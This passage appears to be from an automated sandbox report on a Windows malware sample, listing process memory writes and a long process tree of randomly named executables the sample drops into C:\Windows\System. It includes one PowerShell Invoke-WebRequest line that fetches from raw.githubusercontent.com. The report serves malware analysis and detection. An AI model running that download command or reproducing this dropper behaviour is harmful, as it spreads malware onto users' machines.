PID 3428 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\RPbpAHo.exe
PID 3428 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\RPbpAHo.exe
PID 3428 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GEDVfiV.exe
PID 3428 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GEDVfiV.exe
PID 3428 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\lQfWRnx.exe
PID 3428 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\lQfWRnx.exe
PID 3428 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\wlywQfv.exe
PID 3428 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\wlywQfv.exe
PID 3428 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\OlHuPyU.exe
PID 3428 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\OlHuPyU.exe
PID 3428 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\JiMyCQR.exe
PID 3428 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\JiMyCQR.exe
PID 3428 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GTfcnns.exe
PID 3428 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GTfcnns.exe
PID 3428 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\leiGMuT.exe
PID 3428 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\leiGMuT.exe
PID 3428 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GfvluYu.exe
PID 3428 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\GfvluYu.exe
PID 3428 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\doPYruV.exe
PID 3428 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\doPYruV.exe
PID 3428 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\byeZGtM.exe
PID 3428 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\byeZGtM.exe
PID 3428 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\cjxDRxy.exe
PID 3428 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\cjxDRxy.exe
PID 3428 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\YpUfwYV.exe
PID 3428 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\YpUfwYV.exe
PID 3428 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\JyTPThp.exe
PID 3428 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\JyTPThp.exe
PID 3428 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\uSSfEKc.exe
PID 3428 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\uSSfEKc.exe
PID 3428 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\nESehyC.exe
PID 3428 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\nESehyC.exe
PID 3428 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\Jrpfcwr.exe
PID 3428 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\Jrpfcwr.exe

Processes

C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\EMahSjJ.exe

C:\Windows\System\EMahSjJ.exe

C:\Windows\System\aKCAmlY.exe

C:\Windows\System\aKCAmlY.exe

C:\Windows\System\xbMKovq.exe

C:\Windows\System\xbMKovq.exe

C:\Windows\System\gKHEctz.exe

C:\Windows\System\gKHEctz.exe

C:\Windows\System\hOglZUz.exe

C:\Windows\System\hOglZUz.exe

C:\Windows\System\rkHvnyk.exe

C:\Windows\System\rkHvnyk.exe

C:\Windows\System\ceKlYdH.exe

C:\Windows\System\ceKlYdH.exe

C:\Windows\System\ejgmYJX.exe

C:\Windows\System\ejgmYJX.exe

C:\Windows\System\xkCSZOf.exe

C:\Windows\System\xkCSZOf.exe

C:\Windows\System\tkQTMyN.exe

C:\Windows\System\tkQTMyN.exe

C:\Windows\System\TjMFNtQ.exe

C:\Windows\System\TjMFNtQ.exe

C:\Windows\System\etHMQHe.exe

C:\Windows\System\etHMQHe.exe

C:\Windows\System\oiisWpg.exe

C:\Windows\System\oiisWpg.exe

C:\Windows\System\yZyyZDP.exe

C:\Windows\System\yZyyZDP.exe

C:\Windows\System\RPbpAHo.exe

C:\Windows\System\RPbpAHo.exe

C:\Windows\System\GEDVfiV.exe

C:\Windows\System\GEDVfiV.exe

C:\Windows\System\lQfWRnx.exe

C:\Windows\System\lQfWRnx.exe

C:\Windows\System\wlywQfv.exe

C:\Windows\System\wlywQfv.exe

C:\Windows\System\OlHuPyU.exe

C:\Windows\System\OlHuPyU.exe

C:\Windows\System\JiMyCQR.exe

C:\Windows\System\JiMyCQR.exe

C:\Windows\System\GTfcnns.exe

C:\Windows\System\GTfcnns.exe

C:\Windows\System\leiGMuT.exe

C:\Windows\System\leiGMuT.exe

C:\Windows\System\GfvluYu.exe

C:\Windows\System\GfvluYu.exe

C:\Windows\System\doPYruV.exe

C:\Windows\System\doPYruV.exe

C:\Windows\System\byeZGtM.exe

C:\Windows\System\byeZGtM.exe

C:\Windows\System\cjxDRxy.exe

C:\Windows\System\cjxDRxy.exe

C:\Windows\System\YpUfwYV.exe

C:\Windows\System\YpUfwYV.exe

C:\Windows\System\JyTPThp.exe

C:\Windows\System\JyTPThp.exe

C:\Windows\System\uSSfEKc.exe

C:\Windows\System\uSSfEKc.exe

C:\Windows\System\nESehyC.exe

C:\Windows\System\nESehyC.exe

C:\Windows\System\Jrpfcwr.exe

C:\Windows\System\Jrpfcwr.exe

C:\Windows\System\GgfoxTr.exe

C:\Windows\System\GgfoxTr.exe

C:\Windows\System\ayYTYGq.exe

C:\Windows\System\ayYTYGq.exe

C:\Windows\System\dZKOjjO.exe

C:\Windows\System\dZKOjjO.exe

C:\Windows\System\hmWwugt.exe

C:\Windows\System\hmWwugt.exe

C:\Windows\System\CBkSwBb.exe

C:\Windows\System\CBkSwBb.exe

C:\Windows\System\MPktnKL.exe

C:\Windows\System\MPktnKL.exe

C:\Windows\System\vJcMENp.exe

C:\Windows\System\vJcMENp.exe

C:\Windows\System\UHCwsUg.exe

C:\Windows\System\UHCwsUg.exe

C:\Windows\System\qAwDEqF.exe

C:\Windows\System\qAwDEqF.exe

C:\Windows\System\RpeIKTw.exe

C:\Windows\System\RpeIKTw.exe

C:\Windows\System\yAzWmCz.exe

C:\Windows\System\yAzWmCz.exe

C:\Windows\System\jyEfBKJ.exe

C:\Windows\System\jyEfBKJ.exe

C:\Windows\System\pMPWUts.exe

C:\Windows\System\pMPWUts.exe

C:\Windows\System\BXPCoQF.exe

C:\Windows\System\BXPCoQF.exe

C:\Windows\System\TlAaskP.exe

C:\Windows\System\TlAaskP.exe

C:\Windows\System\cQSqvKn.exe

C:\Windows\System\cQSqvKn.exe

C:\Windows\System\qVWIfQX.exe

C:\Windows\System\qVWIfQX.exe

C:\Windows\System\tyymIMt.exe

C:\Windows\System\tyymIMt.exe

C:\Windows\System\LiDkwVM.exe

C:\Windows\System\LiDkwVM.exe

C:\Windows\System\QvgAhUS.exe

C:\Windows\System\QvgAhUS.exe

C:\Windows\System\ueSKkqQ.exe

C:\Windows\System\ueSKkqQ.exe

C:\Windows\System\WwoZQPz.exe

C:\Windows\System\WwoZQPz.exe

C:\Windows\System\fqPuqam.exe

C:\Windows\System\fqPuqam.exe

C:\Windows\System\YDlUKhy.exe

C:\Windows\System\YDlUKhy.exe

C:\Windows\System\CTMsuQj.exe

C:\Windows\System\CTMsuQj.exe

C:\Windows\System\CvcaOUC.exe

C:\Windows\System\CvcaOUC.exe

C:\Windows\System\MmctVjF.exe

C:\Windows\System\MmctVjF.exe

C:\Windows\System\jzlsqWr.exe

C:\Windows\System\jzlsqWr.exe

C:\Windows\System\otjnWOw.exe

C:\Windows\System\otjnWOw.exe

C:\Windows\System\sAdwKWF.exe

C:\Windows\System\sAdwKWF.exe

C:\Windows\System\pflqtkN.exe

C:\Windows\System\pflqtkN.exe

C:\Windows\System\BFNeIVY.exe

C:\Windows\System\BFNeIVY.exe

C:\Windows\System\eVPTUoA.exe

C:\Windows\System\eVPTUoA.exe

C:\Windows\System\ZFpPdCw.exe

C:\Windows\System\ZFpPdCw.exe

C:\Windows\System\KQiqczT.exe

C:\Windows\System\KQiqczT.exe

C:\Windows\System\kHpUAia.exe

C:\Windows\System\kHpUAia.exe

C:\Windows\System\IBGhTNc.exe

C:\Windows\System\IBGhTNc.exe

C:\Windows\System\dPkcAVl.exe

C:\Windows\System\dPkcAVl.exe

C:\Windows\System\QqHncIL.exe

C:\Windows\System\QqHncIL.exe

C:\Windows\System\PwcnUEZ.exe

C:\Windows\System\PwcnUEZ.exe

C:\Windows\System\ucFNvjp.exe

C:\Windows\System\ucFNvjp.exe

C:\Windows\System\lHdyCBb.exe

C:\Windows\System\lHdyCBb.exe

C:\Windows\System\iyIwaJd.exe

C:\Windows\System\iyIwaJd.exe

C:\Windows\System\vFQDVbM.exe

C:\Windows\System\vFQDVbM.exe

C:\Windows\System\vDJgVYH.exe

C:\Windows\System\vDJgVYH.exe

C:\Windows\System\EENWkEK.exe

C:\Windows\System\EENWkEK.exe

C:\Windows\System\dMkcDfZ.exe

C:\Windows\System\dMkcDfZ.exe

C:\Windows\System\oVSXbAl.exe

C:\Windows\System\oVSXbAl.exe

C:\Windows\System\hciOoli.exe

C:\Windows\System\hciOoli.exe

C:\Windows\System\fPlnMwe.exe

C:\Windows\System\fPlnMwe.exe

C:\Windows\System\LKvpHfe.exe

C:\Windows\System\LKvpHfe.exe

C:\Windows\System\aRfJKSC.exe

C:\Windows\System\aRfJKSC.exe

C:\Windows\System\cdkPjzy.exe

C:\Windows\System\cdkPjzy.exe

C:\Windows\System\lGfebtF.exe

C:\Windows\System\lGfebtF.exe

C:\Windows\System\bapOdWL.exe

C:\Windows\System\bapOdWL.exe

C:\Windows\System\LctzKbX.exe

C:\Windows\System\LctzKbX.exe

C:\Windows\System\lHdibvE.exe

C:\Windows\System\lHdibvE.exe

C:\Windows\System\wMAdYHD.exe

C:\Windows\System\wMAdYHD.exe

C:\Windows\System\pNcMRVr.exe

C:\Windows\System\pNcMRVr.exe

C:\Windows\System\ACbhuTa.exe

C:\Windows\System\ACbhuTa.exe

C:\Windows\System\IGVeMZY.exe

C:\Windows\System\IGVeMZY.exe

C:\Windows\System\lCedQtS.exe

C:\Windows\System\lCedQtS.exe

C:\Windows\System\nWZonGb.exe

C:\Windows\System\nWZonGb.exe

C:\Windows\System\wbPkqLm.exe

C:\Windows\System\wbPkqLm.exe

C:\Windows\System\faugfEb.exe

C:\Windows\System\faugfEb.exe

C:\Windows\System\cxDopor.exe

C:\Windows\System\cxDopor.exe

C:\Windows\System\hyzpOcb.exe

C:\Windows\System\hyzpOcb.exe

C:\Windows\System\dYMyzGi.exe

C:\Windows\System\dYMyzGi.exe

C:\Windows\System\tdjhoaB.exe

C:\Windows\System\tdjhoaB.exe

C:\Windows\System\TMnfpYt.exe

C:\Windows\System\TMnfpYt.exe

C:\Windows\System\UtclCQZ.exe

C:\Windows\System\UtclCQZ.exe

C:\Windows\System\YxmbWcF.exe

C:\Windows\System\YxmbWcF.exe

C:\Windows\System\fXmDILR.exe

C:\Windows\System\fXmDILR.exe

C:\Windows\System\qruqquD.exe

C:\Windows\System\qruqquD.exe

C:\Windows\System\SnrJUHQ.exe

C:\Windows\System\SnrJUHQ.exe

C:\Windows\System\xcgkhOB.exe

C:\Windows\System\xcgkhOB.exe

C:\Windows\System\gxzDTKo.exe

C:\Windows\System\gxzDTKo.exe

C:\Windows\System\OLrtEDR.exe

C:\Windows\System\OLrtEDR.exe

C:\Windows\System\foMZgtB.exe

C:\Windows\System\foMZgtB.exe

C:\Windows\System\unRsXON.exe

C:\Windows\System\unRsXON.exe

C:\Windows\System\MhEkflJ.exe

C:\Windows\System\MhEkflJ.exe

C:\Windows\System\TjMDIHm.exe

C:\Windows\System\TjMDIHm.exe

C:\Windows\System\SBGXEIF.exe

C:\Windows\System\SBGXEIF.exe

C:\Windows\System\VytnCTC.exe

C:\Windows\System\VytnCTC.exe

C:\Windows\System\AuunmIm.exe

C:\Windows\System\AuunmIm.exe

C:\Windows\System\XfjVrGb.exe

C:\Windows\System\XfjVrGb.exe

C:\Windows\System\JsHhPQD.exe

C:\Windows\System\JsHhPQD.exe

C:\Windows\System\aTwgFrG.exe

C:\Windows\System\aTwgFrG.exe

C:\Windows\System\GsnLcrn.exe

C:\Windows\System\GsnLcrn.exe

C:\Windows\System\RcxoSHr.exe

C:\Windows\System\RcxoSHr.exe

C:\Windows\System\AEuVJPD.exe

C:\Windows\System\AEuVJPD.exe

C:\Windows\System\SoOdUqN.exe

C:\Windows\System\SoOdUqN.exe

C:\Windows\System\MJDYJKm.exe

C:\Windows\System\MJDYJKm.exe

C:\Windows\System\UneOQLR.exe

C:\Windows\System\UneOQLR.exe

C:\Windows\System\LQWeCQR.exe

C:\Windows\System\LQWeCQR.exe

C:\Windows\System\synHfXj.exe

C:\Windows\System\synHfXj.exe

C:\Windows\System\OXNadeM.exe

C:\Windows\System\OXNadeM.exe

C:\Windows\System\aCAwqaG.exe

C:\Windows\System\aCAwqaG.exe

C:\Windows\System\ncUOIPa.exe

C:\Windows\System\ncUOIPa.exe

C:\Windows\System\drvjzcR.exe

C:\Windows\System\drvjzcR.exe

C:\Windows\System\SSyUvRj.exe

C:\Windows\System\SSyUvRj.exe

C:\Windows\System\riucacz.exe

C:\Windows\System\riucacz.exe

C:\Windows\System\ovjsPiE.exe

C:\Windows\System\ovjsPiE.exe

C:\Windows\System\pNZIdkt.exe

C:\Windows\System\pNZIdkt.exe

C:\Windows\System\HZEhBbP.exe

C:\Windows\System\HZEhBbP.exe

C:\Windows\System\cxjhNNJ.exe

C:\Windows\System\cxjhNNJ.exe

C:\Windows\System\EJTyroe.exe

C:\Windows\System\EJTyroe.exe

C:\Windows\System\xDTyIxd.exe

C:\Windows\System\xDTyIxd.exe

C:\Windows\System\YvrvCFq.exe

C:\Windows\System\YvrvCFq.exe

C:\Windows\System\WfeelXs.exe

C:\Windows\System\WfeelXs.exe

C:\Windows\System\qhfCZEK.exe

C:\Windows\System\qhfCZEK.exe

C:\Windows\System\OVVlPCD.exe

C:\Windows\System\OVVlPCD.exe

C:\Windows\System\qFvRkzI.exe

C:\Windows\System\qFvRkzI.exe

C:\Windows\System\lNDbIqt.exe

C:\Windows\System\lNDbIqt.exe

C:\Windows\System\zvDYZGd.exe

C:\Windows\System\zvDYZGd.exe

C:\Windows\System\kyBSRcH.exe

C:\Windows\System\kyBSRcH.exe

C:\Windows\System\hasnlsQ.exe

C:\Windows\System\hasnlsQ.exe

C:\Windows\System\ZmJBeSG.exe

C:\Windows\System\ZmJBeSG.exe

C:\Windows\System\MAslSCi.exe

C:\Windows\System\MAslSCi.exe

C:\Windows\System\qLLoHOi.exe

C:\Windows\System\qLLoHOi.exe

C:\Windows\System\teqqXaq.exe

C:\Windows\System\teqqXaq.exe

C:\Windows\System\hlSsOmf.exe

C:\Windows\System\hlSsOmf.exe

C:\Windows\System\cXNHdHR.exe

C:\Windows\System\cXNHdHR.exe

C:\Windows\System\KDMscAU.exe

C:\Windows\System\KDMscAU.exe

C:\Windows\System\KdLNVBe.exe

C:\Windows\System\KdLNVBe.exe

C:\Windows\System\yjcoXph.exe

C:\Windows\System\yjcoXph.exe

C:\Windows\System\OOHJeuq.exe

C:\Windows\System\OOHJeuq.exe

C:\Windows\System\zdhkmAe.exe

C:\Windows\System\zdhkmAe.exe

C:\Windows\System\JsYlAYc.exe

C:\Windows\System\JsYlAYc.exe

C:\Windows\System\wnShuaJ.exe

C:\Windows\System\wnShuaJ.exe

C:\Windows\System\jnOdYDw.exe

C:\Windows\System\jnOdYDw.exe

C:\Windows\System\HvbqUbb.exe

C:\Windows\System\HvbqUbb.exe

C:\Windows\System\DoyRNJh.exe

C:\Windows\System\DoyRNJh.exe

C:\Windows\System\TbcLPJb.exe

C:\Windows\System\TbcLPJb.exe

C:\Windows\System\sPFlRFA.exe

C:\Windows\System\sPFlRFA.exe

C:\Windows\System\oBiWpVJ.exe

C:\Windows\System\oBiWpVJ.exe

C:\Windows\System\tPagYTK.exe

C:\Windows\System\tPagYTK.exe

C:\Windows\System\SRPDjqw.exe

C:\Windows\System\SRPDjqw.exe

C:\Windows\System\ymIuMnh.exe

C:\Windows\System\ymIuMnh.exe

C:\Windows\System\umxWbgK.exe

C:\Windows\System\umxWbgK.exe

C:\Windows\System\eBbQbgy.exe

C:\Windows\System\eBbQbgy.exe

C:\Windows\System\QgZlvoS.exe

C:\Windows\System\QgZlvoS.exe

C:\Windows\System\qBhdmSs.exe

C:\Windows\System\qBhdmSs.exe

C:\Windows\System\UFhZQKl.exe

C:\Windows\System\UFhZQKl.exe

C:\Windows\System\nzYNKca.exe

C:\Windows\System\nzYNKca.exe

C:\Windows\System\wSWjpku.exe

C:\Windows\System\wSWjpku.exe

C:\Windows\System\nByXMqO.exe

C:\Windows\System\nByXMqO.exe

C:\Windows\System\YNslLJx.exe

C:\Windows\System\YNslLJx.exe

C:\Windows\System\BAnLQXp.exe

C:\Windows\System\BAnLQXp.exe

C:\Windows\System\ZKdXCNg.exe

C:\Windows\System\ZKdXCNg.exe

C:\Windows\System\JoCgCvP.exe

C:\Windows\System\JoCgCvP.exe

C:\Windows\System\zGMDZrU.exe

C:\Windows\System\zGMDZrU.exe

C:\Windows\System\jKdMNqs.exe

C:\Windows\System\jKdMNqs.exe

C:\Windows\System\godtzer.exe

C:\Windows\System\godtzer.exe

C:\Windows\System\FqOGVWN.exe

C:\Windows\System\FqOGVWN.exe

C:\Windows\System\uBmPOUT.exe

C:\Windows\System\uBmPOUT.exe

C:\Windows\System\cjrSZTH.exe

C:\Windows\System\cjrSZTH.exe

C:\Windows\System\Belixzh.exe

C:\Windows\System\Belixzh.exe

C:\Windows\System\cwKRzMv.exe

C:\Windows\System\cwKRzMv.exe

C:\Windows\System\mVBnHxF.exe

C:\Windows\System\mVBnHxF.exe

C:\Windows\System\rBqldvJ.exe

C:\Windows\System\rBqldvJ.exe

C:\Windows\System\uxvFsGR.exe

C:\Windows\System\uxvFsGR.exe

C:\Windows\System\xTwjspR.exe

C:\Windows\System\xTwjspR.exe

C:\Windows\System\DpkUZUE.exe

C:\Windows\System\DpkUZUE.exe

C:\Windows\System\ICRAhyU.exe

C:\Windows\System\ICRAhyU.exe

C:\Windows\System\hkGPgDF.exe

C:\Windows\System\hkGPgDF.exe

C:\Windows\System\nvUQiJL.exe

C:\Windows\System\nvUQiJL.exe

C:\Windows\System\CxPVTxY.exe

C:\Windows\System\CxPVTxY.exe

C:\Windows\System\KshERKl.exe

C:\Windows\System\KshERKl.exe

C:\Windows\System\SuqQodd.exe

C:\Windows\System\SuqQodd.exe

C:\Windows\System\YRvSzwH.exe

C:\Windows\System\YRvSzwH.exe

C:\Windows\System\HJjLeBF.exe

C:\Windows\System\HJjLeBF.exe

C:\Windows\System\DOVyAXz.exe

C:\Windows\System\DOVyAXz.exe

C:\Windows\System\seFDOzK.exe

C:\Windows\System\seFDOzK.exe

C:\Windows\System\aZeHVaF.exe

C:\Windows\System\aZeHVaF.exe

C:\Windows\System\XQEWhZA.exe

C:\Windows\System\XQEWhZA.exe

C:\Windows\System\XKCJzYF.exe

C:\Windows\System\XKCJzYF.exe

C:\Windows\System\JaRyiMm.exe

C:\Windows\System\JaRyiMm.exe

C:\Windows\System\ghoBCnM.exe

C:\Windows\System\ghoBCnM.exe

C:\Windows\System\Dbxsbpg.exe

C:\Windows\System\Dbxsbpg.exe

C:\Windows\System\GSNfftx.exe

C:\Windows\System\GSNfftx.exe

C:\Windows\System\ZySqQCf.exe

C:\Windows\System\ZySqQCf.exe

C:\Windows\System\cuMYtjL.exe

C:\Windows\System\cuMYtjL.exe

C:\Windows\System\NuVBFyf.exe

C:\Windows\System\NuVBFyf.exe

C:\Windows\System\rnIARzk.exe

C:\Windows\System\rnIARzk.exe

C:\Windows\System\JYhTOVu.exe

C:\Windows\System\JYhTOVu.exe

C:\Windows\System\nyMHcnz.exe

C:\Windows\System\nyMHcnz.exe

C:\Windows\System\VhbadTy.exe

C:\Windows\System\VhbadTy.exe

C:\Windows\System\fvxkIrB.exe

C:\Windows\System\fvxkIrB.exe

C:\Windows\System\YEZVlJf.exe

C:\Windows\System\YEZVlJf.exe

C:\Windows\System\AtGquzj.exe

C:\Windows\System\AtGquzj.exe

C:\Windows\System\NyPAGkA.exe

C:\Windows\System\NyPAGkA.exe

C:\Windows\System\VmDvjGs.exe

C:\Windows\System\VmDvjGs.exe

C:\Windows\System\Tkeelcu.exe

C:\Windows\System\Tkeelcu.exe

C:\Windows\System\RFDfJht.exe

C:\Windows\System\RFDfJht.exe

C:\Windows\System\RDBYLXh.exe

C:\Windows\System\RDBYLXh.exe

C:\Windows\System\JteYrIv.exe

C:\Windows\System\JteYrIv.exe

C:\Windows\System\wWrEwxd.exe

C:\Windows\System\wWrEwxd.exe

C:\Windows\System\KIllRiU.exe

C:\Windows\System\KIllRiU.exe

C:\Windows\System\GseZWie.exe

C:\Windows\System\GseZWie.exe

C:\Windows\System\ITMHOpy.exe

C:\Windows\System\ITMHOpy.exe

C:\Windows\System\CtjUdyz.exe

C:\Windows\System\CtjUdyz.exe

C:\Windows\System\YmMVAFO.exe

C:\Windows\System\YmMVAFO.exe

C:\Windows\System\bFZptuT.exe

C:\Windows\System\bFZptuT.exe

C:\Windows\System\jvYVcLr.exe

C:\Windows\System\jvYVcLr.exe

C:\Windows\System\PNhLBcm.exe

C:\Windows\System\PNhLBcm.exe

C:\Windows\System\MoWQsoO.exe

C:\Windows\System\MoWQsoO.exe

C:\Windows\System\liEeGvP.exe

C:\Windows\System\liEeGvP.exe

C:\Windows\System\rYqYdag.exe

C:\Windows\System\rYqYdag.exe

C:\Windows\System\YEcCfkZ.exe

C:\Windows\System\YEcCfkZ.exe

C:\Windows\System\JVRwnbw.exe

C:\Windows\System\JVRwnbw.exe

C:\Windows\System\zlVsqNF.exe

C:\Windows\System\zlVsqNF.exe

C:\Windows\System\RJDvfiP.exe

C:\Windows\System\RJDvfiP.exe

C:\Windows\System\NHlzkud.exe

C:\Windows\System\NHlzkud.exe

C:\Windows\System\dqCbFOh.exe

C:\Windows\System\dqCbFOh.exe

C:\Windows\System\kDoVNrg.exe

C:\Windows\System\kDoVNrg.exe

C:\Windows\System\RttKqXs.exe

C:\Windows\System\RttKqXs.exe

C:\Windows\System\VXiSytQ.exe

C:\Windows\System\VXiSytQ.exe

C:\Windows\System\TdpBTAj.exe

C:\Windows\System\TdpBTAj.exe

C:\Windows\System\EPRvuZc.exe

C:\Windows\System\EPRvuZc.exe

C:\Windows\System\zAzGKdi.exe

C:\Windows\System\zAzGKdi.exe

C:\Windows\System\HdzYhaG.exe

C:\Windows\System\HdzYhaG.exe

C:\Windows\System\PeTsmxL.exe

C:\Windows\System\PeTsmxL.exe

C:\Windows\System\UDHroYI.exe

C:\Windows\System\UDHroYI.exe

C:\Windows\System\NkcThCm.exe

C:\Windows\System\NkcThCm.exe

C:\Windows\System\lbStYPz.exe

C:\Windows\System\lbStYPz.exe

C:\Windows\System\EwmGaLA.exe

C:\Windows\System\EwmGaLA.exe

C:\Windows\System\ZzquinI.exe

C:\Windows\System\ZzquinI.exe

C:\Windows\System\llRGQXf.exe

C:\Windows\System\llRGQXf.exe

C:\Windows\System\RkYPMbj.exe

C:\Windows\System\RkYPMbj.exe

C:\Windows\System\OpMzLId.exe

C:\Windows\System\OpMzLId.exe

C:\Windows\System\ujFOyiw.exe

C:\Windows\System\ujFOyiw.exe

C:\Windows\System\xGRrpkM.exe

C:\Windows\System\xGRrpkM.exe

C:\Windows\System\LJsHRCD.exe

C:\Windows\System\LJsHRCD.exe

C:\Windows\System\ENOjHwk.exe

C:\Windows\System\ENOjHwk.exe

C:\Windows\System\nxedIbu.exe

C:\Windows\System\nxedIbu.exe

C:\Windows\System\mQjBwaa.exe

C:\Windows\System\mQjBwaa.exe

C:\Windows\System\MiqmWvl.exe

C:\Windows\System\MiqmWvl.exe

C:\Windows\System\agtUnwN.exe

C:\Windows\System\agtUnwN.exe

C:\Windows\System\USHWHYL.exe

C:\Windows\System\USHWHYL.exe

C:\Windows\System\hUHnlHX.exe

C:\Windows\System\hUHnlHX.exe

C:\Windows\System\tZkKwMd.exe

C:\Windows\System\tZkKwMd.exe

C:\Windows\System\SIMvvfs.exe

C:\Windows\System\SIMvvfs.exe

C:\Windows\System\DScMgFC.exe

C:\Windows\System\DScMgFC.exe

C:\Windows\System\WsZfLez.exe

C:\Windows\System\WsZfLez.exe

C:\Windows\System\vaVIJlw.exe

C:\Windows\System\vaVIJlw.exe

C:\Windows\System\fyAmhAi.exe

C:\Windows\System\fyAmhAi.exe

C:\Windows\System\HizJNGu.exe

C:\Windows\System\HizJNGu.exe

C:\Windows\System\ugFfPET.exe

C:\Windows\System\ugFfPET.exe

C:\Windows\System\waoSHFj.exe

C:\Windows\System\waoSHFj.exe

C:\Windows\System\spFViup.exe

C:\Windows\System\spFViup.exe

C:\Windows\System\FLIkJyv.exe

C:\Windows\System\FLIkJyv.exe

C:\Windows\System\sDkLgtT.exe

C:\Windows\System\sDkLgtT.exe

C:\Windows\System\fCYDHzt.exe

C:\Windows\System\fCYDHzt.exe

C:\Windows\System\hDlDoIz.exe

C:\Windows\System\hDlDoIz.exe

C:\Windows\System\qZhsQmB.exe

C:\Windows\System\qZhsQmB.exe

C:\Windows\System\CqBrevR.exe

C:\Windows\System\CqBrevR.exe

C:\Windows\System\uDBGBol.exe

C:\Windows\System\uDBGBol.exe

C:\Windows\System\dMqLlev.exe

C:\Windows\System\dMqLlev.exe

C:\Windows\System\MLEjiZm.exe

C:\Windows\System\MLEjiZm.exe

C:\Windows\System\lVtbyoP.exe

C:\Windows\System\lVtbyoP.exe

C:\Windows\System\zydLYLb.exe

C:\Windows\System\zydLYLb.exe

C:\Windows\System\UoucTIq.exe

C:\Windows\System\UoucTIq.exe

C:\Windows\System\kpaTrvq.exe

C:\Windows\System\kpaTrvq.exe

C:\Windows\System\gwEQAqH.exe

C:\Windows\System\gwEQAqH.exe

